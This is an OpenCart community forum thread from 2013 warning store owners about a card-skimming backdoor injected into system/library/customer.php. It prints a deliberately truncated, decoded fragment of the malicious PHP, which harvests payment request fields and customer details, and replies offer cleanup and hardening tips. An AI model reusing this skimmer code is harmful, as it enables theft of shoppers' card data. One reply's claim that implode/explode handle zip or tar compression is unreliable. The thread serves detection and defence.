OpenCart Community

Posted: **Tue May 21, 2013 9:50 pm**

With the rise in cases of malicious files being uploaded into many OpenCart installations, we should all protect our clients. I manage to get my hands on the codes uploaded maliciously and looked into it.

The code does no harm to the store owners, but seems to your clients instead. Seems to be stealing credit card information.

A quick look at the codes, it shows their data being packed into binary string.

Code: Select all

pack("H*",substr($h,$i,2))

and after packing and uncompressed it, the following portion of the code is what you get. Pretty long, but a quick look seems like getting your credit card information.

Code: Select all

]) && substr($req['route'],0,8)=='payment/') { if(isset($req['cc_number']) || isset($req['ccnum']) || isset($req['CardNumber']) || isset($req['cardNumber']) || isset($req['cardnumber']) || isset($req['transaction']['credit_card']) || isset($req['fatzebra']) || isset($req['payment']['cc_number']) || isset($req['webpos_cc_number'])) { $df=DB_PREFIX; $ccc=$db->query("SELECT ".$df."customer.customer_id,".$df."customer.firstname, ".$df."customer.lastname, ".$df."customer.email, ".$df."customer.telephone, ".$df."customer.ip, ".$df."address.firstname as a_fn, ".$df."address.lastname as a_ln, ".$df."address.company, ".$df."address.address_1, ".$df."address.address_2, ".$df."address.city, ".$df."address.postcode, ".$df."country.iso_code_3, ".$df."zone.code, ".$df."zone.name FROM ".$df."customer LEFT JOIN ".$df."address ON ".$df."customer.customer_id=".$df."address.customer_id LEFT JOIN ".$df."country ON ".$df."address.country_id=".$df."country.country_id LEFT JOIN ".$df."zone ON ".$df."address.zone_id=".$df."zone.zone_id WHERE ".$df."customer.customer_id = '".(int)$ses['customer_id']."' AND ".$df."address.address_id = '".(int)$ses['payment_address_id']."'"); $sr='err'; if ($ccc->num_rows) { $sr=time().'|'.implode("|",array_merge($ccc->row,array(serialize($req)))); } elseif(isset($ses['guest'])) { $gs=$ses["guest"]; $pay=$ses["guest"]["payment"]; $sr=time().'|-1|'.(isset($gs['firstname'])?$gs['firstname']:'').'|'.(isset($gs['lastname'])?$gs['lastname']:'').'|'.(isset($gs['email'])?$gs['email']:'').'|'.(isset($gs['telephone'])?$gs['telephone']:'').'|'.(@$_SERVER['REMOTE_ADDR']).'|'.(isset($pay['firstname'])?$pay['firstname']:'').'|'.(isset($pay['lastname'])?$pay['lastname']:'').'|'.(isset($pay['company'])?$pay['company']:'').'|'.(isset($pay['address_1'])?$pay['address_1']:'').'|'.(isset($pay['address_2'])?$pay['address_2']:'').'|'.(isset($pay['city'])?$pay['city']:'').'|'.(isset($pay['postcode'])?$pay['postcode']:'').'|'.(isset($pay['iso_code_3'])?$pay['iso_code_3']:'').'|'.(isset($pay['zone_code'])?$pay['zone_code']:'').'|'.(isset($pay['zone'])?$pay['zone']:'').'|'.serialize($req); }

What you should look at to stop this:

1. Look at your OpenCart installation's download folder. Remove files that aren't meant to be in there.
2. Look at your encryption key, ensure it's no longer 12345.
3. Look at your system/library/customer.php file and ensure there's no codes that look like the following:

Code: Select all

function h2b($h) {

4. Change your download directory to something else if possible.

That should be all

Posted: **Wed May 22, 2013 5:17 pm**

Thank you for the information

Posted: **Wed May 22, 2013 6:24 pm**

@ MarketInSG, where is dat code located?

Posted: **Thu May 23, 2013 12:35 am**

the have added some functions to system/library/customer.php. And packing and uncompressing it, you will get the codes I mentioned above. A further deeper look can get you some information they also store as cacne.language.1536510365. Look at how they spell cache as cacne to store data retrieved.

Posted: **Wed Jun 05, 2013 5:31 am**

Thank you for that one, MarketInSG!

Scanning by eye for "pack" and other oddball words, and for and any subtle misspellings, will help. Paying attention to timestamps as well as to file sizes everywhere in the directory trees will help. Familiarity with those is invaluable in finding problems, as well as eliminating them.

Your or your client's servers may allow a setting to approve outbound connections, meaning to specific destinations. Turning that on can play havoc with .atom or .rss feeds, but it does prevent using the website as a relay or as a hacked source of outbound messages. Requirements for php mail and for smtp mail can be tightened, and augmenting the special means by such simple means as an spf text record can help to truncate usage before and after the in-house outbound senders (the final -all means no others, ~all means all but maybe not).

It's worth renaming download/ to something not readily guessed, whether with a prefix or suffix, a synonym of some sort, or gibberish. Just remember to change both config.php, and probably to let vqmod in on it, too (there's an editable path file in /vqmod, for such changes as those).

Posted: **Thu Jun 06, 2013 3:29 am**

Interesting. Where the code "portion . . . seems like getting your credit card information" above, and may have been truncated (by MarketInSG) so as not to give wrong people the whole idea, what we're seeing may have aborted:

It asks, looks, joins, implodes, then asks anew, looks, and then stops. The conditional "{ if(isset($req" sets up for the next "{ $df=DB_PREFIX" and "query("SELECT ".$df." of non-card customer registration data, for the ensuing "LEFT JOIN" of the corresponding non-card data IDs, before the next { goes to ".implode("|",array_merge($ccc->row,array" of those, and before the closing "}" whereupon "elseif(isset($ses['guest'])" looks instead at guest data, then payment portal and payment data with a closing "}".

The attempt may well have failed to go out, or to have set up properly for encryption and decryption of data, even if it were or was cached as a language file (with a .trailer extension calling to mind the .jpg.trailerextensions). It imploded itself, he exploded it (zip/tar, unzip/untar). Without untangling the entirety we can only hope that it was a "work in progress" and was not fully armed or usable. I aborted one that was fully entrenched, was fully armed, and operated globally, but that had evidently failed to extract usable card information or to open the database itself -- but for the oxymoron it was almost "elegantly malicious and disruptive"; but otherwise to no net avail of consequence.

Posted: **Thu Jun 06, 2013 10:49 am**

i truncated the codes so that it doesn't go around being used by everyone

i don't know what's with zip/tar etc...but they stored it simply in a file

Posted: **Thu Jun 06, 2013 12:38 pm**

Truncating that as I thought you might have done was a jolly good idea.

The implode and other similar commands are to compress, and the explode and other similar commands are to decompress, either into/from a "zipped" file on Windows or a "tarred" file on Linux-Unix. Nowadays most utilities and make and open both files.

Posted: **Sat Jun 08, 2013 5:02 pm**

This is a must if you want to remain on the business and if you want to succeed on it.

OpenCart Community

Protect your Clients

Protect your Clients

Re: Protect your Clients

Re: Protect your Clients

Re: Protect your Clients

Re: Protect your Clients

Re: Protect your Clients

Re: Protect your Clients

Re: Protect your Clients

Re: Protect your Clients